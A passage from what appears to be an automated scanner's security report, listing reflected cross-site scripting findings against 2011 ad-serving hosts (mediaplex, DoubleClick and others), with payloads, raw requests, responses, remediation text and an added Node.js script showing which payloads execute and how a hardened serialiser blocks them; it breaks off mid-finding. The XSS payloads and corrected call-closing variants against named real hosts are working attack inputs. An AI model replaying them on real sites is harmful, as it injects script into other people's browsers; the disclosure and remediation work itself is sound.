The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4888f'%3balert(1)//bc918fe2e78 was submitted in the mpck parameter. This input was echoed as 4888f';alert(1)//bc918fe2e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D5701394888f'%3balert(1)//bc918fe2e78&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:54 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4286
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=5701394888f';alert(1)//bc918fe2e78" target="_blank">
...[SNIP]...

5.56. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e11d8'%3balert(1)//93f53f18417 was submitted in the mpvc parameter. This input was echoed as e11d8';alert(1)//93f53f18417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fe11d8'%3balert(1)//93f53f18417 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?e11d8';alert(1)//93f53f18417http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=570139" target="_blank">
...[SNIP]...

5.57. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c25c0"%3balert(1)//f9353723fef was submitted in the mpvc parameter. This input was echoed as c25c0";alert(1)//f9353723fef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fc25c0"%3balert(1)//f9353723fef HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:50 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";alert(1)//f9353723fef");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?c25c0";a
...[SNIP]...

5.58. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into the application's response. The payload 845e0%0aalert(1)//2a6a5889652 was submitted in the url parameter. This input was echoed as 845e0
alert(1)//2a6a5889652
in the application's response, the %0a having been decoded to a literal newline.

The scanner classified the injection point as a JavaScript rest-of-line comment, but the only // in the echoed text is the scheme separator of the URL being reported back. In the response shown, the value sits in the plain text of a 136-byte text/html error body that contains no script element, so the newline and alert(1) are displayed as text rather than executed; the response also carries X-XSS-Protection: 1; mode=block. The reflection is unencoded, but demonstrating script execution here would need a payload containing HTML markup, which this request does not show.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0%0aalert(1)//2a6a5889652&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/by-category/Sailing_Regatta HTTP/1.1
Host: iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:11:26 GMT
Expires: Fri, 06 May 2011 21:11:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 136

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/recommended_pages.xml845e0
alert(1)//2a6a5889652
. HTTP error 400

5.59. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adi/nbcu.lim.har/news-local-article

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3573"style%3d"x%3aexpression(alert(1))"61fc2b812f1 was submitted in the !category parameter. This input was echoed as e3573"style="x:expression(alert(1))"61fc2b812f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers. In other browsers the injected double quote still terminates the href attribute, so the same injection point accepts an event-handler attribute (for example onmouseover=...) in place of style; the remediation, attribute encoding of the !category value, is the same in either case.

Request

GET /adi/nbcu.lim.har/news-local-article;!category=e3573"style%3d"x%3aexpression(alert(1))"61fc2b812f1 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:11 GMT
Expires: Sat, 07 May 2011 22:38:11 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/n;44306;0-0;0;60666716;6202-272/94;0/0/0;;~okv=;!category=e3573"style="x:expression(alert(1))"61fc2b812f1;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.60. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adi/nbcu.lim.har/pid_ap_news-politics-article

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f640"style%3d"x%3aexpression(alert(1))"9aa3ecb8008 was submitted in the !category parameter. This input was echoed as 7f640"style="x:expression(alert(1))"9aa3ecb8008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers. In other browsers the injected double quote still terminates the href attribute, so the same injection point accepts an event-handler attribute (for example onmouseover=...) in place of style; the remediation, attribute encoding of the !category value, is the same in either case.

Request

GET /adi/nbcu.lim.har/pid_ap_news-politics-article;!category=7f640"style%3d"x%3aexpression(alert(1))"9aa3ecb8008 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:04 GMT
Expires: Sat, 07 May 2011 22:38:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/u;44306;0-0;0;51208971;6202-272/94;0/0/0;;~okv=;!category=7f640"style="x:expression(alert(1))"9aa3ecb8008;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.61. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/hp-index

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f39c'%3balert(1)//0561d806161 was submitted in the !category parameter. This input was echoed as 2f39c';alert(1)//0561d806161 in the application's response.

This proof-of-concept confirms that the single quote is not escaped, so the !category value can terminate the string literal. Note, however, that the echoed payload leaves the surrounding document.write( call unclosed (document.write('<a target="_top" href="...!category=2f39c';alert(1)//...), so the script as shown fails to parse instead of running alert(1). A payload that first closes the call, of the form ');alert(1)//, would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/hp-index;!category=2f39c'%3balert(1)//0561d806161 HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:37:36 GMT
Expires: Sat, 07 May 2011 22:37:36 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/m;44306;0-0;0;39564225;6202-272/94;0/0/0;;~okv=;!category=2f39c';alert(1)//0561d806161;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.62. http://iv.doubleclick.net/adj/nbcu.lim.har/news-local-article [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/news-local-article

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1dd'%3balert(1)//1430357386d was submitted in the !category parameter. This input was echoed as cf1dd';alert(1)//1430357386d in the application's response.

This proof-of-concept confirms that the single quote is not escaped, so the !category value can terminate the string literal. Note, however, that the echoed payload leaves the surrounding document.write( call unclosed (document.write('<a target="_top" href="...!category=cf1dd';alert(1)//...), so the script as shown fails to parse instead of running alert(1). A payload that first closes the call, of the form ');alert(1)//, would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/news-local-article;!category=cf1dd'%3balert(1)//1430357386d HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:18 GMT
Expires: Sat, 07 May 2011 22:38:18 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/n;44306;0-0;0;60666716;6202-272/94;0/0/0;;~okv=;!category=cf1dd';alert(1)//1430357386d;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...

5.63. http://iv.doubleclick.net/adj/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iv.doubleclick.net
Path:   /adj/nbcu.lim.har/pid_ap_news-politics-article

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34a6d'%3balert(1)//51dc94f4e3b was submitted in the !category parameter. This input was echoed as 34a6d';alert(1)//51dc94f4e3b in the application's response.

This proof-of-concept confirms that the single quote is not escaped, so the !category value can terminate the string literal. Note, however, that the echoed payload leaves the surrounding document.write( call unclosed (document.write('<a target="_top" href="...!category=34a6d';alert(1)//...), so the script as shown fails to parse instead of running alert(1). A payload that first closes the call, of the form ');alert(1)//, would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/nbcu.lim.har/pid_ap_news-politics-article;!category=34a6d'%3balert(1)//51dc94f4e3b HTTP/1.1
Host: iv.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 07 May 2011 22:38:13 GMT
Expires: Sat, 07 May 2011 22:38:13 GMT

document.write('<a target="_top" href="http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/u;44306;0-0;0;51208971;6202-272/94;0/0/0;;~okv=;!category=34a6d';alert(1)//51dc94f4e3b;bsg=101037;bsg=102220;;~aopt=2/1/f1/1;~sscs=%3f">
...[SNIP]...
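
Findings 5.57 and 5.61 to 5.63 all place a request value inside a JavaScript string literal, double-quoted in the mediaplex response and single-quoted inside document.write() in the three DoubleClick responses, and the payload relies on ending the literal with a matching quote, adding a statement, and commenting out the rest of the line. The Node.js script below is an added example, not code from the report or from either ad server: it rebuilds both vulnerable templates in the shape of the responses shown, compiles them with the report's payloads and with payloads that also close the enclosing call, and contrasts them with a serialiser that emits a string literal no input can escape. The template shapes are modelled on the responses; the function names are assumptions.

```javascript
// Added example (not from the report): a request value spliced into a
// JavaScript string literal, as in findings 5.57 and 5.61 to 5.63, with the
// report's payloads, a corrected payload, and a serialiser the value cannot
// escape. Template shapes are modelled on the responses; names are assumed.

// Prefixes of the two URLs, taken from the report's responses.
const BASE_DOUBLE = 'http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;'
  + '0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?';
const BASE_SINGLE = 'http://iv.doubleclick.net/click;h=v8/3b00/0/0/%2a/m;44306;'
  + '0-0;0;39564225;6202-272/94;0/0/0;;~okv=;!category=';

// The payloads as submitted (they leave the enclosing call unclosed) and the
// variants that close the call first.
const REPORTED_DOUBLE = 'c25c0";alert(1)//f9353723fef';
const CLOSING_DOUBLE = 'c25c0");alert(1)//f9353723fef';
const REPORTED_SINGLE = "2f39c';alert(1)//0561d806161";
const CLOSING_SINGLE = "2f39c');alert(1)//0561d806161";

// Vulnerable template shaped like the 5.57 response: raw value inside "...".
function renderNaiveDouble(href) {
  return 'var mpvclick = encodeURIComponent("' + href + '");';
}

// Vulnerable template shaped like the 5.61 response: raw value inside '...'.
function renderNaiveSingle(href) {
  return "document.write('<a target=\"_top\" href=\"" + href + "\">');";
}

// Hardened serialiser: JSON.stringify produces a double-quoted literal with
// quotes, backslashes and control characters escaped; the second pass
// hex-escapes '<', '>' and '/' (so "</script>" cannot end an inline block)
// plus the U+2028/U+2029 line terminators. Valid for any input string.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\/\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafeDouble(href) {
  return 'var mpvclick = encodeURIComponent(' + jsStringLiteral(href) + ');';
}

function renderSafeSingle(href) {
  // The href inside the markup still needs HTML attribute encoding; this
  // example only addresses the JavaScript string layer.
  return 'document.write(' + jsStringLiteral('<a target="_top" href="' + href + '">') + ');';
}

// Harness: compile and run a rendered snippet with alert() and document
// replaced by stand-ins. Returns 'syntax error', 'executed' or 'inert'.
function outcome(code) {
  let fn;
  try {
    fn = new Function('alert', 'document', code);
  } catch (e) {
    return e instanceof SyntaxError ? 'syntax error' : 'runtime error';
  }
  let fired = false;
  try {
    fn(() => { fired = true; }, { write() {} });
  } catch (e) {
    return 'runtime error';
  }
  return fired ? 'executed' : 'inert';
}

// The serialiser must give back exactly the original value when parsed.
function roundTrips(value) {
  return new Function('return ' + jsStringLiteral(value))() === String(value);
}

const CASES = [
  ['naive ", reported payload', renderNaiveDouble(BASE_DOUBLE + REPORTED_DOUBLE)],
  ['naive ", closing payload', renderNaiveDouble(BASE_DOUBLE + CLOSING_DOUBLE)],
  ['safe ",  closing payload', renderSafeDouble(BASE_DOUBLE + CLOSING_DOUBLE)],
  ["naive ', reported payload", renderNaiveSingle(BASE_SINGLE + REPORTED_SINGLE)],
  ["naive ', closing payload", renderNaiveSingle(BASE_SINGLE + CLOSING_SINGLE)],
  ["safe ',  closing payload", renderSafeSingle(BASE_SINGLE + CLOSING_SINGLE)],
];
for (const [label, code] of CASES) {
  console.log(label.padEnd(26), outcome(code));
}
```

The reported payloads compile to a syntax error because the quote ends the literal but nothing closes the call it sits in; the closing variants execute, and the serialised versions stay inert while parsing back to the original value. JSON.stringify on its own leaves / and < untouched, which is why the extra hex-escaping pass is there: without it a value containing </script> would still end an inline script block. Encoding for the JavaScript layer does not replace HTML attribute encoding of the href that document.write() emits, which is a separate step for the HTML layer.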

5.64. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 9b3c3<script>alert(1)</script>fd92264a39e was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept confirms that the ct value is echoed without any encoding. The reflection, however, lands on a // comment line of a response served as application/x-javascript: a browser that honours the declared Content-Type neither renders the injected <script> tag as HTML nor executes it as script, so exploitation depends on the response being interpreted as HTML (for example through content-type sniffing).

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:08 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS9b3c3<script>alert(1)</script>fd92264a39e

5.65. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e69b7<script>alert(1)</script>70b75349d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept confirms that unknown parameter names are echoed without any encoding. As in the previous finding, the reflection lands on a // comment line of a response served as application/x-javascript: a browser that honours the declared Content-Type neither renders the injected <script> tag as HTML nor executes it as script, so exploitation depends on the response being interpreted as HTML (for example through content-type sniffing).

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&e69b7<script>alert(1)</script>70b75349d17=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
